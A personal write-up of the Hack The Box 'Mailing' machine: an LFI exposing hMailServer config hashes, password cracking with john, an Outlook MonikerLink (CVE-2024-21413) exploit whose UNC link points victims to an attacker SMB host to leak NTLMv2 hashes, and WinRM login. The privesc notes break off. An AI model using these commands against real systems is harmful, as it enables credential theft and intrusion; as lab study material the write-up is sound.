Mailing - Writeup - Konstantinovitz

## Recon ### WAPP - 80 ![[Pasted image 20250226171859.png]] ![[Pasted image 20250226171914.png]] Download mail instructions ![[Pasted image 20250226172530.png]] ### [hMailServer](https://www.hmailserver.com/) ![[Pasted image 20250226172747.png]] ``` 993/tcp open ssl/imap syn-ack ttl 127 hMailServer imapd |_ssl-date: TLS randomness does not represent time | ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU/organizationalUnitName=MAILING/[email protected]/localityName=Madrid | Issuer: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU/organizationalUnitName=MAILING/[email protected]/localityName=Madrid ``` We may have a username: `[email protected]` ## Initial Access ### Discovering LFI ``` GET /download.php?file=../../../Program%20Files%20(x86)\hMailServer\Bin\hMailServer.ini HTTP/1.1 Host: mailing.htb User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive Referer: http://mailing.htb/ Upgrade-Insecure-Requests: 1 Priority: u=0, i ``` ``` [Directories] ProgramFolder=C:\Program Files (x86)\hMailServer DatabaseFolder=C:\Program Files (x86)\hMailServer\Database DataFolder=C:\Program Files (x86)\hMailServer\Data LogFolder=C:\Program Files (x86)\hMailServer\Logs TempFolder=C:\Program Files (x86)\hMailServer\Temp EventFolder=C:\Program Files (x86)\hMailServer\Events [GUILanguages] ValidLanguages=english,swedish [Security] AdministratorPassword=841bb5acfa6779ae432fd7a4e6600ba7 [Database] Type=MSSQLCE Username= Password=0a9f8ad8bf896b501dde74f08efd7e4c PasswordEncryption=1 Port=0 Server= Database=hMailServer Internal=1 ``` ### Password Cracking #### Administrator password: `841bb5acfa6779ae432fd7a4e6600ba7` ``` ╭─[λ]-[~/targets/mailing/1_initial-access]-[10.10.11.14] ╰─> john --wordlist=/home/noctua/arsenal/wordlists/rockyou.txt admin-MD5.hash --format=Raw-MD5 Using default input encoding: UTF-8 Loaded 1 password hash (Raw-MD5 [MD5 256/256 AVX2 8x3]) Warning: no OpenMP support for this hash type, consider --fork=8 Note: Passwords longer than 18 [worst case UTF-8] to 55 [ASCII] rejected Press 'q' or Ctrl-C to abort, 'h' for help, almost any other key for status homenetworkingadministrator (?) 1g 0:00:00:00 DONE (2025-02-26 19:52) 2.381g/s 18005Kp/s 18005Kc/s 18005KC/s homerandgiego..homeiyun88 Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably Session completed. ``` `homenetworkingadministrator` how the hell do we leverage this? took another hint from IPPSEC who just logged in using `administrator` on the SMTP server. #### MSSQLCE Password: `0a9f8ad8bf896b501dde74f08efd7e4c` > AdministratorPassword - The main hMailServer administration password. The user for example needs to enter this password when starting hMailServer Administrator. This password is encoded using MD5. >Username - hMailServer will use this username when connecting to the database server. If it's left empty, and MSSQL is used, hMailServer will try to use Windows Authentication. > Passwordencryption - If set to 1, the database password is encrypted using blowfish. In this case, the hMailServer service decodes the password before connecting to the database. > 1 - Blowfish. Store passwords encrypted using Blowfish. This is not recommended, since the password used for encryption is known. Hence, this is no more safe than option 0. ### SMTP Authentication After some fuckery and additional hint I realize that there's a tool named `swaks` which let me interact with SMPT servers through the commandline. Another thing I missed was just simply guessing the "[email protected]" account.... So we test out authentication: ``` ╭─[λ]-[~/targets/mailing/1_initial-access]-[10.10.11.14] ╰─> swaks --auth-user '[email protected]' --auth LOGIN --auth-password homenetworkingadministrator --quit-after AUTH --server mailing.htb === Trying mailing.htb:25... === Connected to mailing.htb. <- 220 mailing.htb ESMTP -> EHLO admin.konstantinovitz.com <- 250-mailing.htb <- 250-SIZE 20480000 <- 250-AUTH LOGIN PLAIN <- 250 HELP -> AUTH LOGIN <- 334 VXNlcm5hbWU6 -> YWRtaW5pc3RyYXRvckBtYWlsaW5nLmh0Yg== <- 334 UGFzc3dvcmQ6 -> aG9tZW5ldHdvcmtpbmdhZG1pbmlzdHJhdG9y <- 235 authenticated. -> QUIT <- 221 goodbye === Connection closed with remote host. ``` ### CVE-2024-21413 - MonikerLink >A vulnerability has been discovered in Microsoft Outlook known as "MonikerLink," which allows an attacker to obtain NTLM hashes and execute arbitrary remote code on a victim machine by exploiting some specially crafted hyperlinks within an email to bypass the protected view of Outlook. ![](https://ik.imagekit.io/14sfaswy6hrz/images/clysjifazg3jo1gn926n1d4qn.png) So [here's](https://www.vicarius.io/vsociety/posts/monikerlink-critical-vulnerability-in-ms-outlook-cve-2024-21413) a noice writeup on the CVE in quesiton, I didn't understand the nitty gritty details to say the least... but I grokked the execution steps: - We start by downloading source code for the CVE - Fire up [[Responder]] on our attacker machine - Receive the NTLM hashes I had no clue how to find this CVE or even to think to look for it in the first place... **CVE execution:** ```sh python CVE-2024-21413.py --server mailing.htb --username [email protected] --password homenetworkingadministrator --sender [email protected] --recipient [email protected] --subject "hello-mudda-focxa" --url "\\10.10.14.11\test\crack" ``` ```sh python CVE-2024-21413.py --server mailing.htb --port 587 --username [email protected] --password homenetworkingadministrator --sender [email protected] --recipient [email protected] --url "\\10.10.14.11\share\sploit" --subject "hax" ``` And we receive a hash: ``` maya::MAILING:b336e8fe619789a6:1214454D1AB4A8C4B7A6C7DDA587A404:0101000000000000804DF7F2A088DB01DE8F981948CE18BA00000000020008003900410054004D0001001E00570049004E002D004900530048003000410041004D00460054004600330004003400570049004E002D004900530048003000410041004D0046005400460033002E003900410054004D002E004C004F00430041004C00030014003900410054004D002E004C004F00430041004C00050014003900410054004D002E004C004F00430041004C0007000800804DF7F2A088DB0106000400020000000800300030000000000000000000000000200000889A337792046245E9F39E3277761FF5C13DC31D0F45E411E869B83A38C1C0F70A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E00310031000000000000000000 ``` Which we'll crack ``` ╭─[λ]-[~/targets/mailing/1_initial-access]-[10.10.11.14] ╰─> john --wordlist=/home/noctua/arsenal/wordlists/rockyou.txt mayas-NTLMv2-SSP.hash Using default input encoding: UTF-8 Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64]) Will run 8 OpenMP threads Press 'q' or Ctrl-C to abort, 'h' for help, almost any other key for status m4y4ngs4ri (maya) 1g 0:00:00:02 DONE (2025-02-27 11:29) 0.4525g/s 2685Kp/s 2685Kc/s 2685KC/s m61403..m379010 Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably Session completed. ``` `maya:m4y4ngs4ri` And finally leverage for initial access via winrm: `evil-winrm -i $RHOST -u maya -p m4y4ngs4ri` ## Privesc - Maya ``` ÉÍÍÍÍÍÍÍÍÍÍ¹ Checking write permissions in PATH folders (DLL Hijacking) È Check for DLL Hijacking in PATH folders https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#dll-hijacking C:\Windows\system32 C:\Windows C:\Windows\System32\Wbem C:\Windows\System32\WindowsPowerShell\v1.0\ C:\Windows\System32\OpenSSH\ C:\Program Files\Git\cmd C:\Program Files\dotnet\ (DLL Hijacking) C:\Users\maya\AppData\Local\Programs\Python\Python312: maya [AllAccess] ÉÍÍÍÍÍÍÍÍÍÍ¹ Scheduled Applications --Non Microsoft-- È Check if you can modify other users scheduled binaries https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.html (MAILING\maya) MailPython: python.exe C:\Users\maya\Documents\mail.py Permissions file: maya [AllAccess] Permissions folder(DLL Hijacking): maya [AllAccess] Trigger: At log on of MAILING\maya ``` ``` *Evil-WinRM* PS C:\Program Files\libreoffice\readmes> cat readme_en-GB.txt ====================================================================== LibreOffice 7.4 ReadMe ====================================================================== ``` ## Lessons Learned - Missed the download thingy - was too rushed - was sure it was just me who sucked at SMTP enumeration blabla - Couldn't get the path thingy to work... Need a baseline LFI query thingy like /etc/passwd: `../../../../../windows/system32/license.rtf` (how did the writeup author figure out that it needed to be this exact nesting level?). - had to take hint for task 5: "What is the 2024 CVE ID for a vulnerability Windows Mail client that can lead to the leak of the users credentials?" - Leverage file disclosures to have the application disclose it's own source code